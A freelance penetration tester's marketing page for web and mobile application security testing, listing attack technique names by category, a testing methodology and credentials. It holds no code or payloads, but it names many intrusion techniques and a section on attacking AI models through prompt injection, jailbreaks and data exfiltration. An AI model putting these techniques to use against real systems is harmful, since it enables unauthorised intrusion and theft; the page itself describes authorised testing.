Offensive Security Services

Full Application
Penetration Testing

Websites & Web Apps  ·  Mobile Apps — Android & iOS

I don't run automated scans and call it a pentest. I operate as a real attacker — manually hunting logic flaws, chained vulnerabilities and business-critical weaknesses that scanners will never find.

Request a Pentest Read My Writeups

Scope of Testing

What I Test

Two engagement types — choose one or combine both for a complete product security assessment.

01

Website & Web Application Pentest

Manual black-box and grey-box testing of corporate websites, SaaS platforms and complex web applications. I map the full attack surface — every endpoint, form, auth flow and business logic path — and exploit vulnerabilities that require a human attacker to find.

Corporate Sites Web Apps Black-Box Grey-Box Authenticated
02

Mobile App Pentest — Android & iOS

Full security assessment of Android and iOS applications — static analysis of the APK/IPA, dynamic testing with Burp Suite traffic interception, insecure storage checks, certificate pinning bypass, reverse engineering and deep-dive into all backend API calls.

Android iOS Static Analysis Dynamic Testing Reverse Engineering

Attack Coverage

What I Hunt For

Every attack listed is a technique I have studied, practised and documented in hands-on labs — not a checklist copied from OWASP.

Authentication Vulnerabilities

  • User Enumeration — Finding Valid Usernames
  • Brute Force & Bypassing Protections
  • Two-Factor Authentication Flaws
  • Persistent Cookie Attacks
  • Password Reset Vulnerabilities
  • Password Change Endpoint Abuse

SQL & NoSQL Injection

  • Blind SQLi — Boolean-Based Data Extraction
  • Blind SQLi — Time-Based Extraction
  • Out-of-Band SQLi — DNS Exfiltration
  • Second-Order (Stored) SQL Injection
  • Injection in Non-Obvious Points
  • Filter Bypass — Comments, Encoding, Whitespace
  • Stacked Queries & Batched Statements
  • File Read & Write via SQL
  • NoSQL — MongoDB Operator Injection
  • NoSQL — JavaScript Injection via $where
  • NoSQL — Projection Manipulation
  • NoSQL — Regex Timing Attack via $regex

XSS Advanced

  • DOM XSS — Sources, Sinks & Exploitation
  • DOM XSS via jQuery Selector Injection
  • Stored XSS in Unusual Injection Contexts
  • XSS via SVG File Upload
  • XSS in XML/SVG with CDATA Bypass
  • Mutation XSS (mXSS)
  • CSP Bypass — Nonce Reflected in Page
  • CSP Bypass via JSONP on Whitelisted Domain
  • CSP Bypass via Open Redirect on Whitelisted Domain
  • XSS to Account Takeover Chain
  • Dangling Markup Injection

CSRF Attacks

  • CSRF Token Not Validated Server-Side
  • CSRF Token Not Tied to Session
  • CSRF via URL — GET-Based State Changes
  • SameSite=Lax Bypass via Top-Level Navigation
  • SameSite=Strict Bypass via Sibling Subdomain XSS
  • SameSite=None + Secure — Exploit Surface
  • Content-Type Bypass for JSON Endpoints
  • Referer Validation Bypass
  • Multi-Step CSRF
  • CSRF Chained with Clickjacking

CORS Attacks

  • Origin Reflection — Server Mirrors the Origin Header
  • Null Origin Exploit — Sandboxed Iframe
  • Subdomain Wildcard Regex Bypass
  • Subdomain Takeover + CORS Chain
  • Trusting HTTP Origins on an HTTPS Site
  • Pre-flight Bypass — Simple Requests
  • CORS with Credentials — Full Account Data Theft PoC

SSRF Attacks

  • Internal Network Scanning via SSRF
  • Cloud Metadata Exploitation (AWS/GCP/Azure)
  • SSRF Filter Bypass Techniques
  • Blind SSRF — Out-of-Band Detection
  • Blind SSRF via Referer Header
  • SSRF via URL in XML / JSON Body
  • SSRF to RCE — Hitting Internal Admin Interfaces
  • SSRF to Read Local Files via file://
  • SSRF in PDF / HTML Rendering Engines

JWT Attacks

  • Algorithm Confusion — RS256 → HS256
  • Algorithm None — Unsigned Tokens
  • Weak HMAC Secret — Brute Force
  • JWK Header Injection — Self-Signed Key
  • JKU Header Injection — Attacker-Controlled JWKS
  • kid Parameter Path Traversal
  • kid SQL Injection
  • Embedded JWK Bypass
  • Symmetric vs Asymmetric Algorithm Confusion

XXE Attacks

  • Classic XXE — Local File Read
  • XXE SSRF — Internal HTTP Requests
  • Blind XXE — Out-of-Band via DNS
  • Blind XXE — Data Exfiltration via External DTD
  • Error-Based XXE
  • XXE via XInclude
  • XXE via File Upload
  • XXE via XSLT Processing
  • XXE via Modified Content-Type
  • XXE Filter Bypass Techniques

Insecure Deserialization

  • PHP Magic Methods & POP Chain Construction
  • PHP Property Injection via Serialized Objects
  • Java Deserialization — readObject & Gadget Chains
  • Identifying Java Serialized Data in HTTP Traffic
  • Python Pickle RCE via __reduce__
  • .NET ViewState — Decoding, Tampering & MAC Bypass
  • Ruby Marshal Gadget Chains
  • Node.js node-serialize — IIFE RCE

Web Cache Attacks

  • Identifying Cache Keys
  • Unkeyed Header — X-Forwarded-Host Poisoning
  • Unkeyed Port & Protocol Poisoning
  • Fat GET — Cache Keys on Method but Ignores Body
  • Cache Poisoning via DOM-Based XSS
  • Parameter Cloaking
  • Cache Key Normalization Tricks
  • Cache Deception — Path Confusion
  • Path Delimiter Confusion
  • Cache Deception via Path Normalization Differences
  • Cookie-Based Cache Deception

HTTP Host Header & Request Smuggling

  • Host Header — Password Reset Poisoning
  • Host Header — Web Cache Poisoning
  • Host Header — Routing-Based SSRF
  • SSRF via X-Forwarded-Host, X-Host, X-Forwarded-Server
  • Request Smuggling — CL.TE
  • Request Smuggling — TE.CL
  • Smuggling to Bypass Front-End Access Controls
  • Smuggling to Capture Another User's Request
  • HTTP/2 Desync — H2.CL and H2.TE

File Upload & Path Traversal

  • Extension Bypass Techniques
  • Content-Type Bypass
  • Magic Bytes Spoofing
  • Polyglot Files — Valid JPEG & Valid PHP
  • Upload to Web Root via Filename Traversal
  • Server-Side Processing Exploits — ImageTragick & FFmpeg SSRF
  • Path Traversal — Encoded Sequences
  • Absolute Path Bypass
  • Extension Restriction Bypass — Null Byte & Required Suffix
  • Zip Slip — Malicious Archive Path Traversal

WebSockets Security

  • Handshake Interception with Burp Suite
  • Cross-Site WebSocket Hijacking (CSWSH)
  • WebSocket SSRF
  • Message Injection — SQLi, XSS, Command Injection
  • Broken WebSocket Authentication
  • WS Token Hijacking via CORS Misconfiguration
  • Message Replay & Manipulation via Burp
  • WS to HTTP Tunneling
  • Lack of Rate Limiting — Brute Force via WebSocket
  • WebSockets and SameSite Cookies

Race Conditions

  • Limit Overrun — Coupon & Discount Reuse
  • Limit Overrun — 2FA OTP Brute Force
  • Single-Packet Attack (HTTP/2)
  • Last-Byte Synchronisation (HTTP/1.1 — Turbo Intruder)
  • Partial Construction Race — Account Creation Window
  • Time-of-Check to Time-of-Use (TOCTOU)
  • Database-Level Races — Concurrent Transactions
  • Session Token Race — Multiple Valid Reset Tokens
  • Detection with Turbo Intruder

API & GraphQL Pentest

  • REST API Recon — JS Mining, Parameter Discovery, Verb Tampering
  • Mass Assignment — Injecting Unexpected Fields
  • Broken Object-Level Authorization (BOLA / IDOR)
  • Broken Function-Level Authorization
  • GraphQL Introspection — Enabled and Disabled
  • GraphQL Query Batching for Rate-Limit Bypass
  • GraphQL CSRF via GET
  • GraphQL IDOR via Mutation
  • GraphQL Deep Nesting DoS
  • JWT and API Key Leakage — JS, localStorage, URLs

Server-Side Attacks

  • Nmap — Service & Version Detection
  • Rapid7 — CVE & Module Research
  • Metasploit Framework — Core Workflow
  • Exploiting Common Services — vsftpd, Samba, EternalBlue, Tomcat
  • Meterpreter — Post-Exploitation
  • Pivoting & Port Forwarding

LLM Attacks

  • Direct Prompt Injection — Overriding the System Prompt
  • Indirect Prompt Injection — Malicious Instructions in External Content
  • Jailbreaking via Persona Assignment
  • Many-Shot Jailbreaking — Context Flooding
  • Training Data Extraction — PII, Code & Secrets
  • Insecure Tool and Plugin Use
  • Prompt Injection via RAG Pipeline Poisoning
  • Data Exfiltration via Markdown Image Rendering
  • LLM-Based SSRF
  • Chained Attack — Indirect Injection to Tool Call to Exfiltration

OAuth 2.0 Attacks

  • Authentication Bypass via Implicit Flow
  • Forced OAuth Profile Linking (CSRF)
  • OAuth Account Hijacking via redirect_uri
  • Stealing Tokens via Open Redirect
  • SSRF via OpenID Dynamic Client Registration

Access Control & IDOR

  • Horizontal Privilege Escalation (IDOR)
  • Vertical Privilege Escalation
  • URL-Based Access Control Bypass
  • Referer-Based Access Control Bypass
  • Multi-Step Process Access Control Bypass

Business Logic Vulnerabilities

  • Price & Discount Manipulation
  • Workflow State Bypass
  • Logic Flaws in Multi-Step Processes
  • Trust Boundary Violations
  • Inconsistent Input Validation

OS Command Injection

  • Blind OS Command Injection via Time Delay
  • Blind OS Command Injection via Out-of-Band (DNS)
  • OS Command Injection — Output Redirection
  • In-Band OS Command Injection

Server-Side Template Injection (SSTI)

  • Template Engine Detection (Jinja2, Twig, Freemarker)
  • Basic SSTI Payload Execution
  • SSTI to Remote Code Execution (RCE)
  • Sandbox Escape via Object Traversal
  • SSTI in Document Generation (PDF, Email)

Prototype Pollution

  • Client-Side Prototype Pollution via Query String
  • Client-Side Prototype Pollution via URL Fragment
  • Prototype Pollution via JSON Input
  • Prototype Pollution to XSS
  • Server-Side Prototype Pollution

DOM-Based Vulnerabilities

  • DOM XSS via Web Messages (postMessage)
  • DOM XSS via Web Messages and JavaScript URL
  • DOM XSS via Web Messages and JSON.parse
  • DOM-Based Open Redirection
  • DOM-Based Cookie Manipulation
  • DOM Clobbering to Enable XSS
  • DOM Clobbering — Bypass HTML Filters (DOMPurify)

Clickjacking

  • Basic Clickjacking
  • Clickjacking with Prefilled Form Input
  • Frame Buster Bypass via Sandbox Attribute
  • Clickjacking to Trigger DOM-Based XSS
  • Multistep Clickjacking

Information Disclosure

  • Information Disclosure in Error Messages
  • Debug Page Information Disclosure
  • Source Code Disclosure via Backup Files
  • Authentication Bypass via HTTP TRACE
  • Version Control History (.git Exposure)

Process

How I Work

A structured adversarial methodology from initial scoping to final remediation guidance.

Scoping & Threat Modelling

Define the attack surface, agree on targets, test accounts and rules of engagement. Build the threat model before touching anything.

Reconnaissance

Map endpoints, parameters, auth flows, third-party integrations and business logic paths. Passive and active recon before exploitation.

Manual Exploitation

Hands-on, manual attack chains — no automated scan reports. I go deep on logic-level vulnerabilities and chained exploits that carry real business risk.

Impact Demonstration

Every finding is proven with a working proof-of-concept. I show what an attacker can actually do, not just flag a theoretical risk.

Reporting

Full written report: executive summary, technical details, CVSS severity ratings, PoC screenshots, and a prioritised remediation roadmap.

Remediation Support

I stay available after delivery to answer developer questions, review fixes, and confirm patches have closed the vulnerabilities found.

Credentials & Experience

Why Trust Me With Your Product

I don't just study security — I practice it every day across bug bounty programs, CTF competitions and real-world engagements.

7+
Years building fullstack applications — I understand how software is architected, which makes me a better attacker.
20+
Vulnerabilities discovered across bug bounty programs and real-world application assessments.
CRTP
Certified Red Team Professional — 24-hour hands-on exam. Internationally recognised offensive security certification.
Daily.
Active practice — CTF competitions, bug bounty hunting and web application pentesting labs, every single day.

What You Get

Deliverables

Every engagement ends with clear, actionable documentation — not a raw scanner dump.

Require a Full Pentest
on Your Product?

Tell me about your application — scope, tech stack and what you need tested. I'll get back to you within 24 hours with a clear proposal.

Your request has been sent. I'll get back to you within 24 hours.